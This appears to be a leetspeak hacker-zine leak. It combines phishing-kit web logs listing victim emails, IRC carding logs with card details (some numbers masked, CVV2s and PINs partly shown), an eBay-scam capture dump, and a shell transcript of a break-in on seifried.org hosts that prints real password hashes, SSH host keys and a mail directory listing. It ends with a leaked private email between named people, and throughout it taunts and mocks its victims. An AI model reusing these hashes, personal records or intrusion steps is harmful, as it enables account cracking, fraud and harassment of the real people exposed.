NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:05 +0200] "GET /www.paypal.com/us/cgi-bin/css/pp_styles_111402.css HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:06 +0200] "GET /www.paypal.com/us/cgi-bin/css/pp_table_styles.css HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:07 +0200] "GET /www.paypal.com/us/cgi-bin/js/pp_main.js HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:07 +0200] "GET /www.paypal.com/us/cgi-bin/pp_check.js HTTP/1.1" 200 2948 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/scr/pixel.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/logo/paypal_logo.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_request_money.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_on_my_account.gif HTTP/1.1" 200 494 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_send_money.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/bg.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_merchant_tools.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_auction_tools.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/SA_off_overview.gif HTTP/1.1" 200 168 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" 24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/SA_off_withdraw.gif HTTP/1.1" 200 175 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)" h3r3 1s r3sultz 0f th31r ph1sh1ng [th3r3 w4z lyk3 10000 3ntr13z l1k3 th1z] Stan@4Focus.com Stan@4Focus.com larry848@earthlink.net&login_password=[editted] larry.barker@honeywell.com&login_password=[editted] larry@fish-jersey.com&login_password=[editted] larry.brophy@trintech.com&login_password=[editted] larez2@juno.com&login_password=[editted] lare@netvalue.net&login_password=[editted] larry@churchamerica.org&login_password=[editted] larry.barker@honeywell.com&login_password=[editted] larujay@rcn.com&login_password=[editted] sndrfh@sdhtr.rty&login_password=[editted] larbet41@juno.com&login_password=[editted] larry.benedet1@sympatico.ca&login_password=[editted] yankeegirl9@hotmail.com&login_password=[editted] larryb@sanantonio.gov&login_password=[editted] Laraine@comcast.net&login_password=[editted] thehudsons@verizon.net&login_password=[editted] joepo@po.com&login_password=[editted] larry@jnabbottdist.com&login_password=[editted] larry.montgomery@verizon.net&login_password=[editted] powermfg@aol.com&login_password=[editted] larabuttigieg001@hotmail.com&login_password=[editted] info@mypreneed.com&login_password=[editted] h3r3 th3y k3pt th3 1mp0rt4nt 1nf0rm4t10n [19:06:32] [DRAUPNER] - 1. Games at draupner.no-ip.org:45093 is UP (login: 760ms ping: N/Ams) [19:06:36] [DRAUPNER] - 2. Dvdr at oden.no-ip.org:45093 is UP (login: 1301ms ping: N/Ams) [19:06:40] [DRAUPNER] - 3. Mvid,Tv,Xvid at miming.no-ip.org:45093 is UP (login: 1254ms ping: N/Ams) [19:06:44] [DRAUPNER] - 4. Xbox,Ps2 at daluniz.no-ip.org:45093 is UP (login: 2339ms ping: N/Ams) [19:06:48] [DRAUPNER] - 5. Svcd,Swe-svcd at gram.no-ip.org:45093 is UP (login: 2133ms ping: N/Ams) [19:06:52] [DRAUPNER] - 6. MP3 at frej.no-ip.org:45093 is UP (login: 1170ms ping: N/Ams) [19:06:55] [DRAUPNER] - 7. 0DAYS,APPS at snotra.no-ip.org:45093 is UP (login: 1204ms ping: N/Ams) l00kz lyk3 th31r sp4mm1ng sh3llz Mar 09 00:11:23 <|Razor|> email = *************@libero.it Mar 09 00:11:23 <|Razor|> phone = ****-***-****** Mar 09 00:11:23 <|Razor|> street = *** ***** ***** 36 Mar 09 00:11:23 <|Razor|> city = ******* Mar 09 00:11:23 <|Razor|> state = IMPERIA Mar 09 00:11:25 <|Razor|> country = Italy Mar 09 00:11:31 <|Razor|> zip = 18038 Mar 09 00:11:33 <|Razor|> cardholder = ***** ********* Mar 09 00:11:35 <|Razor|> ccnumber = **************** Mar 09 00:11:37 <|Razor|> expiremonth = 05 Mar 09 00:11:39 <|Razor|> expireyear = 2006 Mar 09 00:11:43 <|Razor|> cvv2 = ******* Mar 09 00:11:45 <|Razor|> bankname = BANCA CARIGE Mar 09 00:11:47 <|Razor|> bankphone = 0039-184-590611 Mar 09 00:11:49 <|Razor|> are vzemi italianska Mar 09 00:12:33 <|Razor|> na edna godina sa mi povecheto Mar 09 00:12:37 <|Razor|> imah edin mnogo bogat arhiv Mar 09 00:12:39 <|Razor|> okolo 500 karti Mar 09 00:12:53 <|Razor|> obache kato usetiha che sme krali ot onzi magazin qvno e imalo mnogo golqma akciq i sa spreni vsichki Mar 09 00:13:07 <|Razor|> ot nachaloto ot kakto sme gi krali pochti vsichki gledam po edno vreme spreni Mar 09 00:13:12 <|Razor|> cvv2 = ******* Mar 09 00:13:23 <|Razor|> 557 e m0r3 budd13z 0f j0ff3r h3lp h1m w1th CC tr4d1ng <|Razor|> country = US <|Razor|> ccmth = 04-Apr <|Razor|> bcity = Allen <|Razor|> rname = <|Razor|> bzip = 75013 <|Razor|> name = D1CK Kahl <|Razor|> sname = <|Razor|> ccname = D1CK L Kahl <|Razor|> phone = XXX-XXX-XXXX <|Razor|> state = TX <|Razor|> bstreet = XXX XXXXXXX Dr <|Razor|> bcountry = US <|Razor|> city = XXXXX <|Razor|> cctype = VISA <|Razor|> ccard = XXXXXXXXXXXXXXXX <|Razor|> cvv2 = 833 <|Razor|> R1 = NO <|Razor|> zip = XXXXX <|Razor|> ccyear = 2006 <|Razor|> email = ******@sbcglobal.net <|Razor|> street = *** ****** ** <|Razor|> bstate = TX Username: joffer123 Password: J0FF3R!@ CC: 1232131232132132 Cvv2: 1233 Exp Date(M-D-Y): 01-1-05 PIN: 1243 SSN: Father Name: F Dob : Mother Name: M Dob : Spouse Name : S dob : Full M : dob : Name on card: asd sad First name: Joffer Last name: Hristov Company: Address: Bukston City: Sofia State: Sofia Country: Postal code: 1618 Phone number: 359888546737-- Seconday phone: -- IP: 85.187.1.208 Date/time: 28.03.2005, 1:26am - using Ebay scam made by RdE & jam3s - Username: joffer123 Password: J0FF3R!@ CC: 1232131232132132 Cvv2: 1233 Exp Date(M-D-Y): 01-1-05 PIN: 1243 SSN: Father Name: F Dob : Mother Name: M Dob : Spouse Name : S dob : Full M : dob : Name on card: asd sad First name: Joffer Last name: Hristov Company: Address: Bukston City: Sofia State: Sofia Country: Postal code: 1618 Phone number: 359888546737-- Seconday phone: -- IP: 85.187.1.208 Date/time: 28.03.2005, 1:26am - using Ebay scam made by RdE & jam3s - Username: joffer123 Password: J0FF3R!@ CC: 1424124124121424 Cvv2: 4214 Exp Date(M-D-Y): 01-1-05 PIN: 1241 SSN: Full M : dob : Name on card: asd sad First name: Joffer Last name: Hristov Company: Address: Bukston City: Sofia State: Sofia Country: Postal code: 1618 Phone number: 359888546737-- Seconday phone: -- IP: 85.187.1.208 Date/time: 28.03.2005, 1:28am Username: joffer123 Password: J0FF3R!@ CC: 1234561234561234 Cvv2: 1232 Exp Date(M-D-Y): 01-1-05 PIN: 2131 Name on card: asd sad First name: Joffer Last name: Hristov Company: Address: Bukston City: Sofia State: Sofia Country: Postal code: 1618 Phone number: 359888546737-- Seconday phone: -- IP: 85.187.1.208 Date/time: 28.03.2005, 1:29am Username: joffer123 Password: J0FF3R!@ CC: 1244141241214214 Cvv2: 1421 Exp Date(M-D-Y): 01-2-06 PIN: 4211 Name on card: TEST POSLEDEN First name: Joffer Last name: Hristov Company: Address: Bukston City: Sofia State: Sofia Country: Postal code: 1618 Phone number: 359888546737-- Seconday phone: -- IP: 85.187.1.208 Date/time: 28.03.2005, 2:31am Username: joffer123 Password: J0FF3R!@ CC: 3293181539518953 Cvv2: 1234 Exp Date(M-D-Y): 01-1-05 PIN: 1234 Name on card: KOLJO E PEDAL First name: Joffer Last name: Hristov Company: Address: Bukston City: Sofia State: Sofia Country: Postal code: 1618 Phone number: 359888546737-- Seconday phone: -- IP: ::1 Date/time: 28.03.2005, 17:36pm Username: jpollarduk Password: XXXXXXXXXXXXXX CC: XXXXXXXXXXXXXXXX Cvv2: 228 Exp Date(M-D-Y): 04-6-07 PIN: 2678 Name on card: XXXXXXXXXXXXXX First name: XXXXXXXXXXXXXX Last name: Company: Address: City: State: Country: Postal code: Phone number: -- Seconday phone: -- IP: 62.252.32.** Date/time: 29.03.2005, 23:15pm Username: kerrbear1724 Password: XXXXXXXX CC: XXXXXXXXXXXXXXXX Cvv2: 745 Exp Date(M-D-Y): 03-31-07 PIN: 8111 Name on card: XXXXXXXXXXXXX First name: XXXXX Last name: XXXXX Company: Address: XXXXXXXXXXXXXXXXXXXXX City: Pittsburgh State: PA Country: Postal code: 15210 Phone number: XXX-XXX-XXXX Seconday phone: -- IP: 151.195.107.** Date/time: 29.03.2005, 23:28pm Username: templedoc23 Password: XXXXXXXX CC: XXXXXXXXXXXXXXXX Cvv2: 611 Exp Date(M-D-Y): 06-6-05 PIN: 0203 Name on card: XXXXXXXXXXXXXX First name: XXXXXXXX Last name: XXXX Company: Address: XXXXXXXXXXXXXXXXXXXXXXXX City: Philadelphia State: PA Country: Postal code: 19107 Phone number: XXX-XXX-XXXX Seconday phone: -- IP: 155.247.166.** Date/time: 29.03.2005, 23:28pm Username: osblue Password: XXXXXXX CC: XXXXXXXXXXXXXXXX Cvv2: 623 Exp Date(M-D-Y): 02-29-08 PIN: none Name on card: XXXXXXXXXXXXX First name: XXXX Last name: XXXXXX Company: Address: XXXXXXXXXXXXXX City: armada State: MI Country: Postal code: 48005 Phone number: XXX-XXX-XXXX Seconday phone: -- IP: 64.136.26.*** Date/time: 29.03.2005, 23:29pm Username: joffer123 Password: J0FF3R!@ CC: 1111111111111111 Cvv2: 1111 Exp Date(M-D-Y): 04-1-07 PIN: 1111 Name on card: 123333333333333333333333333333 First name: Joffer Last name: Hristov Company: Address: Bukston City: Sofia State: Sofia Country: Postal code: 1618 Phone number: 359888546737-- Seconday phone: -- IP: 66.92.22.164 Date/time: 29.03.2005, 23:42pm j0ff3r'z db 0f st0ld3n sh1t. Account Nickname: Checking Account Type/Number: INTEREST MAXIMIZER ACCOUNT-2068 Type: Debit Transaction Description: Online Banking transfer to Sav **** Conf# **********; Rodgers, ******* Date: 04/12/2005 Amount: $1,000.00 j0ff3r us1ng th3 st0ld3n 4cc0untz. -~-~-~-~ truzt exploits.cx / securitydot.net! fr0m th31r f4q l0c4t3d @ http://exploits.cx/?path=/FAQ/&cid=6#11 " How do we know your not just selling the exploits to DDoSers/Spammers/Extortionists? We are not selling the private exploits we buy to anyone! We do realize however that gaining your trust will take time.Unfortunately proving this for a fact is impossible. " d1spr0v1ng 1t w4z 4z 34zy 4z 0wn1ng th3z3 dumb b1tch3z. 10.txt -~-~-~ ethics@idefense.com n0w l3tz ch3ck 0ut h0w idefense c0mp4r3z. # uname -a Linux srv01-sun.seifried.org 2.6.9-34.0.2.EL #1 Fri Jun 30 10:22:45 EDT 2006 x86_64 x86_64 x86_64 GNU/Linux # w 01:45:43 up 5 days, 29 min, 0 users, load average: 0.00, 0.01, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT # ls -al /home total 24 drwxr-xr-x 3 root root 4096 Feb 20 05:17 . drwxr-xr-x 24 root root 4096 Jul 13 01:16 .. drwx------ 5 seifadm seifadm 4096 May 31 02:19 seifadm # ssh fw01.seifried.org root@fw01.seifried.org's Password: # grep -v '*' /etc/master.passwd | grep -v '!' root:$2a$08$y1pmAsmDkwNWN7W5qacH0OgdwdOkxKr.TdtzboIDRcwqW9Y/oKaRC:0:0:daemon:0:0:Charlie &:/root:/bin/ksh seifadm:$2a$06$./VaGlR.ESmUaKGln1wUZe8yTfoJczQzXpT1h.jUqDYAoulnhdmk2:1000:1000::0:0:seifadm:/home/seifadm:/bin/ksh dhartmei:$2a$06$EbtJldePdQwD8ajM4nU45ummi8UuFHyyd6j59fJgW4sDtU5qKpoBe:1001:1001::0:0:dhartmei:/home/dhartmei:/bin/ksh vdanen:$2a$06$R9uNq4qNO85xEVIdyTFmvuDPGWk2CcbByLe562sewIX8.qGJW88Ym:1002:1002::0:0:Vincent Danen:/home/vdanen:/bin/ksh # ssh fw00.seifried.org root@fw00.seifried.org's Password: # grep -v '*' /etc/master.passwd | grep -v '!' root:$2a$08$IolfxFNJ2/ijWriQ1B2xwu4nVUbfVH4kLQfQrhAl8DTGmU0EXDTmC:0:0:daemon:0:0:Kurt Seifried,,,:/root:/bin/ksh seifadm:$2a$06$9YzLc71Cadc.NLA63Mz0duCaSfIUsKhQpwzemu9HoZzVVcaZpIrQi:1000:1000::0:0:SEIFRIED ADMIN:/home/seifadm:/bin/ksh dhartmei:$2a$06$EbtJldePdQwD8ajM4nU45ummi8UuFHyyd6j59fJgW4sDtU5qKpoBe:1001:1001::0:0:dhartmei:/home/dhartmei:/bin/ksh vdanen:$2a$06$xa06iQRtNd8RKcSLEuG9M.Z8FEAG95PscWDClhtIbdfuoy8r1paN2:1002:1002::0:0:Vincent Danen:/home/vdanen:/bin/ksh # cat /root/.ssh/known_hosts fw01,216.234.189.4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ== srv01,216.234.189.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt8JHM7YHSlM4OIV87+tu2/eDY8ImO/k5uPsJomIqlC7/hN45SXsZ07gLQ8OEBmNPyN+bNWP2TRvjykcBsSeVIAy8jdZE1yt5lT4gGAOGyfawZwBh1EFqCnHoECqc2u3Cha1bLV+jDNAwzTj5oQrv9DMcBo8T3kuDuovL/DJJLjk= fw01.seifried.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ== srv05,216.234.189.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApEmVQUZUs6ajW/6Kyddfj3zMa60gzYmbBTuDELy1I9bfYHO6D4835HlJnT3cNovuACoMrzs9y0tJGANvox5rJ20Slm6KE2PH0twS0lZcd4cOMtKhOUcGuch/aXTNnGDhrsFQNf3PHxKRuM0AT2qjvLLlghIhYntLSrergb7CZT0= srv00,216.234.189.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuL/2zr2HSNfyBDuuHFoCbvS8Q/rZeCXFTMWZOPdvMEFZ6wve9phCPb1dwEj7kOlqTpZ+iq9uH/LCPfdVjaBIOAcN4BrZRuv3ABIZZ3MndkD+Q5kfoTZ7LUYgivladV+AYwscyxjU3LvPh4AFM/HrrQBJvVTN39ty/qNOmPh89sc= undeadly.org,66.51.111.60 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtRx9+LNuWKXBPRsyMWk3Snzzrcft91cWtQc3d8i+qccY42Rz2QAFPuxLeBiOYwE0EI0TL/t3gmhML5ywktFN8jhWNk+m/hLSYTVOZ4ckXg37uJLdJRIx3KlybJhlGuXADYCDcjIfj4cNOnqW9KHwJmFIc/X7PoBXojYZAXlXk90ELl4csAwcDCZRInh49vEaRHE4jj/yvgpXrZBErTFZgmY21Btnbmj1olRRs2HfDd60t/BzGXQs9P6gI2EP01ONF9OWZAX+CNRC/ru+yVR/mVx0i4Ah5Osd5GZIhxMQLLjYW/HOd/+weIPc09xv4io+01VyH2zmOOf/rOAYJcBTSQ== sputnik.firstfoundation.ca,142.179.165.115 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv8//etsP6DIW3wKQl0ggaGrLb9Y2JR9CzW6ADFyDZwWwIpBZ7dE+0dYN4LeyrXWhVUnX1QDY5z8CpI6zoLpmrmKFMyoxE+fkfqFAbQeqcjJwnf77XHYaqEYYcOyssZFD67M/hu9LmcJXZ725hWmCLZH3SNblS1wVqIBXuv7ZNkk= # ssh srv00.seifried.org root@srv00.seifried.org's Password: # cat root/.ssh/known_hosts fw01,216.234.189.4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ== srv01,216.234.189.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt8JHM7YHSlM4OIV87+tu2/eDY8ImO/k5uPsJomIqlC7/hN45SXsZ07gLQ8OEBmNPyN+bNWP2TRvjykcBsSeVIAy8jdZE1yt5lT4gGAOGyfawZwBh1EFqCnHoECqc2u3Cha1bLV+jDNAwzTj5oQrv9DMcBo8T3kuDuovL/DJJLjk= fw01.seifried.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ== srv05,216.234.189.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApEmVQUZUs6ajW/6Kyddfj3zMa60gzYmbBTuDELy1I9bfYHO6D4835HlJnT3cNovuACoMrzs9y0tJGANvox5rJ20Slm6KE2PH0twS0lZcd4cOMtKhOUcGuch/aXTNnGDhrsFQNf3PHxKRuM0AT2qjvLLlghIhYntLSrergb7CZT0= srv00,216.234.189.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuL/2zr2HSNfyBDuuHFoCbvS8Q/rZeCXFTMWZOPdvMEFZ6wve9phCPb1dwEj7kOlqTpZ+iq9uH/LCPfdVjaBIOAcN4BrZRuv3ABIZZ3MndkD+Q5kfoTZ7LUYgivladV+AYwscyxjU3LvPh4AFM/HrrQBJvVTN39ty/qNOmPh89sc= undeadly.org,66.51.111.60 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtRx9+LNuWKXBPRsyMWk3Snzzrcft91cWtQc3d8i+qccY42Rz2QAFPuxLeBiOYwE0EI0TL/t3gmhML5ywktFN8jhWNk+m/hLSYTVOZ4ckXg37uJLdJRIx3KlybJhlGuXADYCDcjIfj4cNOnqW9KHwJmFIc/X7PoBXojYZAXlXk90ELl4csAwcDCZRInh49vEaRHE4jj/yvgpXrZBErTFZgmY21Btnbmj1olRRs2HfDd60t/BzGXQs9P6gI2EP01ONF9OWZAX+CNRC/ru+yVR/mVx0i4Ah5Osd5GZIhxMQLLjYW/HOd/+weIPc09xv4io+01VyH2zmOOf/rOAYJcBTSQ== sputnik.firstfoundation.ca,142.179.165.115 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv8//etsP6DIW3wKQl0ggaGrLb9Y2JR9CzW6ADFyDZwWwIpBZ7dE+0dYN4LeyrXWhVUnX1QDY5z8CpI6zoLpmrmKFMyoxE+fkfqFAbQeqcjJwnf77XHYaqEYYcOyssZFD67M/hu9LmcJXZ725hWmCLZH3SNblS1wVqIBXuv7ZNkk= # grep -v '*' /etc/shadow | grep -v '!' root:$1$JOEv50Xr$Hhe.Uun5STrEpxilm0dz//:13192:0:99999:7::: seifadm:$1$JauNGolY$GRPOj.WdEH63ehURLtdcP1:13192:0:99999:7::: # ssh srv01.seifried.org root@srv01.seifried.org's Password: # grep -v '*' /etc/shadow | grep -v '!' root:$1$k4NSHkWi$wWfG2vILiWiV1mgkUxt1T/:13174:0:99999:7::: # ssh srv03.seifried.org root@srv00.seifried.org's Password: # grep -v '*' /etc/shadow | grep -v '!' root:$1$4u15hKhb$ZIpCxjsMgILB3PtuwzoqJ0:13195:0:99999:7::: seifadm:$1$QttOF4NI$FxPCgKBlW6GGHWTVg9TAC/:13195:0:99999:7::: kurt:$1$T.6KJ61W$0.gmpZrsOw6uKRSScifM//:13199:0:99999:7::: bt:$1$6cvGun1f$jkMo9kqDjmQuv./66h0B41:13199:0:99999:7::: listuser:$1$6cvGun1f$jkMo9kqDjmQuv./66h0B41:13199:0:99999:7::: freescan2:$1$AjenHD.3$A8GlIW6VKOS4FQ7soTkn..:13199:0:99999:7::: helen:$1$Gj6BQ.Qt$yneo5WlvCoRIbRvHEeQPH0:13199:0:99999:7::: neil:$1$JWGjqsKY$81MQ/ViZ0wL98N2VFxjFy.:13199:0:99999:7::: anke:$1$uAk6tGUC$EGHcjiQZ/QXdd0B5RkG3m.:13199:0:99999:7::: ensimwpl:$1$4Aac3MrU$QniFg8EUaxoSr9M7flnyn.:13217:0:99999:7::: #ls /home/kurt/mail 1009067.html 37 Drafts Junk E-mail Sent Sent Items Trash all business cissp conference cve dance dating edmforsale ensim foo foo~ freescan google-ads inbox jimreavis lavalife lavalife-Shannon list-mod-archives list-moderation old old-email old-sent-items paper personalbest ports portslist receipts saved-messages security-book securityscanner spam test test90 tuesday-meeting verisign viruses # cat /home/kurt/mail/Sent\ Items -~-~-~ 3d1t3d du3 t0 l4m3n3zz -~-~-~ # w3 3nj0y3d th3 punctu4t10n & th3 w3ll us3 0f 4dj3ct1v3z 1n th3 vip@idefense.com 3m41lz, 4lth0ugh th3y w3r3 3xtr3m3ly b0r1ng. y0u'd th1nk w1th 4ll th3 drug 4dd1ctz @ idefense th3y w0uld b3 a b1t m0r3 l1v3ly. 4ls0.. sh0uldnt y0u guyz b3 uz1ng pgp 0r s0m3th1ng? h0no w1ll 0ff3r a 0n3 t1m3 s3cur1ty 4ud1t 0f th3 v3r1s1gn vpnz 1f y0u pr0m0t3 th3 d4t4th31f t0 l34d th3 p3nt3zt1ng (w3 h34r h3'z g0t th3 0d4yz). 0n3 m0r3 th1ng.. th1z 3m41l m4d3 uz sp1t 0ur m1lk 0ut. From kurt@srv00.seifried.org Thu Oct 27 01:52:06 2005 Reply-To: "Kurt Seifried" From: "Kurt Seifried" To: "Jim Reavis" References: Subject: Re: invoice for Sept Date: Thu, 27 Oct 2005 01:52:06 -0600 MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1"; reply-type=original Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.2670 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670 Status: RO Content-Length: 4333 X-UID: 5842 X-Keywords: > Just getting around to paying this today, sorry for the delay, have been > traveling too much. No problem, > I haven't given you anything to do for your Oct invoice, maybe you could > do > a little thinking for me on: One random thought: Cisco's new Layer two control plans, have an agent on the system/etc, what about IP devices that can't run the agent and need network access, and have sufficiently complex software to be a problem, like VOIP phones (most of which seem to have a web setup), it occurs to me an attacker can simply arp spoof/etc an IP device that doesn't have to run the agent. > Secure Software Development - anything out there interest you in terms of > tools or methodologies? (Fortify, Ounce Labs, etc) I am attaching a preso > MS does, interested in your reaction to what they are doing, is it good? They're getting slightly better but one huge hole is QA. I found yet another gaping flaw in PGP that is trivial to test (took me 10 seconds to find it once I decided to look for it) and should have been addressed with the last bug report I did on PGP with respect to alternate data streams. PGP is obviously not doing any real QA, and if they are they're ignoring the results (scary either way). > Any perspective about where companies are overspending/underspending on > security? Corporations I think are probably spending more on technology when they could get a better return by investing in people and process. Good change control/up to date patching and (boring bit here) enforcing least privilege would go a long way. I recently spent 3 hours totally tightening up the firewalls for seifried.org (I now allow SYN in for a few tcp ports, and for UDP on port 53 and established connections out with a default deny policy), restricting ssh (listen on the main IP only, only allow "seifried" in), restricting various services (i.e. WWW servers now listen only on the specific IP's that are needed, not every IP attached to the system). But now the only way you can get interactive shell access to seifried.org is with my password (which I plan to block soon and only allow public key auth). The service listening lock down is especially useful since any changes now require tweaking the firewall and the server to expose a new service to the world, I'm unlikely to accidently expose something if I have to make two sets of different changes on different systems, my goal is to make it hard for me to make mistakes. > Anything interesting you are seeing from the threat side or any other > angle, > interesting investment oppty, etc? A lot more use of intelligence. I'm seeing SSH login attempts for adm, root, ftp and so on, and for 